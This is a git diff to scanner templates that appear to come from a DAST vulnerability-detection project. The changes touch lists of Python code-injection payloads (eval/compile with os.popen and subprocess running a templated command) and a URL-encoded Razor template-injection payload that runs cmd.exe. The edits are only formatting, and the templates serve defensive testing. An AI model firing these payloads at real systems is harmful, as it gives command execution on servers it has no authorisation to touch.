diff --git a/dast/vulnerabilities/cmdi/python-code-injection.yaml b/dast/vulnerabilities/cmdi/python-code-injection.yaml
index fd9516dc7a6..5563b22ec77 100644
--- a/dast/vulnerabilities/cmdi/python-code-injection.yaml
+++ b/dast/vulnerabilities/cmdi/python-code-injection.yaml
@@ -4,8 +4,6 @@ info:
   name: Python Code Injection
   author: ritikchaddha
   severity: high
-  metadata:
-    max-request: 
   tags: python,dast,injection,cmdi
 
 variables:
@@ -20,18 +18,18 @@ http:
     payloads:
       injection:
         - eval(compile("""for x in range(1):\\n import os\\n os.popen(r'{{Command}}').read()""",'','single'))
-        #without loop, one expression
+        # without loop, one expression
         - eval(compile("""__import__('os').popen(r'{{Command}}').read()""",'','single'))
-        #without loop, one expression
+        # without loop, one expression
         - eval(compile("""__import__('subprocess').check_output(r'{{Command}}',shell=True)""",'','single'))
-        #without compile
+        # without compile
         - __import__('os').popen('{{Command}}').read()
-        #multiple expressions, separated by commas
+        # multiple expressions, separated by commas
         - str("-"*50),__import__('os').popen('{{Command}}').read()
-        #multiple statements, separated by semicolons
+        # multiple statements, separated by semicolons
         - eval(compile("""__import__('os').popen(r'{{Command}}').read();import time;time.sleep(2)""",'','single'))
         - eval(compile("""__import__('subprocess').check_output(r'{{Command}}',shell=True);import time;time.sleep(2)""",'','single'))
-        #with `for` loop technique, without global __import__ using subprocess.popen
+        # with `for` loop technique, without global __import__ using subprocess.popen
         - eval(compile("""for x in range(1):\n import os\n os.popen(r'{{Command}}').read()""",'','single'))
         - eval(compile("""for x in range(1):\n import subprocess\n subprocess.Popen(r'{{Command}}',shell=True, stdout=subprocess.PIPE).stdout.read()""",'','single'))
         - eval(compile("""for x in range(1):\n import subprocess\n subprocess.check_output(r'{{Command}}',shell=True)""",'','single'))
diff --git a/dast/vulnerabilities/ssti/razor-ssti.yaml b/dast/vulnerabilities/ssti/razor-ssti.yaml
index aa6b5a71001..616901d8f8d 100644
--- a/dast/vulnerabilities/ssti/razor-ssti.yaml
+++ b/dast/vulnerabilities/ssti/razor-ssti.yaml
@@ -20,7 +20,7 @@ http:
 
     payloads:
       injection:
-        - "@{string+x%3Dnull%3Bint[]l%3D{105%2C100}%3Bforeach(int+c+in+l){x%2B%3D((char)c).ToString()%3B}%3B}@System.Diagnostics.Process.Start("cmd.exe"%2C+"/c+"+x)"
+        - "@{string+x%3Dnull%3Bint[]l%3D{105%2C100}%3Bforeach(int+c+in+l){x%2B%3D((char)c).ToString()%3B}%3B}@System.Diagnostics.Process.Start(%22cmd.exe%22%2C+%22/c+%22+x)"
 
     fuzzing:
       - part: query